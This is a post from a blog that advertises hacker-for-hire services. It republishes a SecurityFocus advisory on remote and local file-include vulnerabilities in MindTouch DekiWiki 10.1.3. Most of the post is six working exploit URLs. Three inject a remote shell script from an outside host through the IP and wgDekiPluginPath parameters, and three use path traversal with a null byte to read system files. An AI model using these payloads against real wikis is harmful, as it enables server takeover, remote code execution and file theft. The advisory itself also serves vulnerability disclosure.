Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863551663

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
source: https://www.securityfocus.com/bid/54991/info

MindTouch DekiWiki is prone to multiple remote and local file-include vulnerabilities because it fails to sufficiently sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary server-side script code that resides on an affected computer or in a remote location with the privileges of the web server process. This may facilitate unauthorized access.

MindTouch DekiWiki 10.1.3 is vulnerable; other versions may also be affected. 

http://www.example.com/deki/web/deki/gui/link.php?IP=http://www.example.com/shell.txt?
http://www.example.com/deki/web/deki/plugins/deki_plugin.php?IP=http://www.example.com/shell.txt?
http://www.example.com/deki/web/deki/plugins/deki_plugin.php?wgDekiPluginPath=http://www.example.com/shell.txt?
http://www.example.com/deki/web/deki/gui/link.php?IP=../../../../../../../../../windows/win.ini%00
http://www.example.com/deki/web/deki/plugins/deki_plugin.php?IP=../../../../../../../../../windows/win.ini%00
http://www.example.com/deki/web/deki/plugins/deki_plugin.php?wgDekiPluginPath=../../../../../../../../../windows/win.ini%00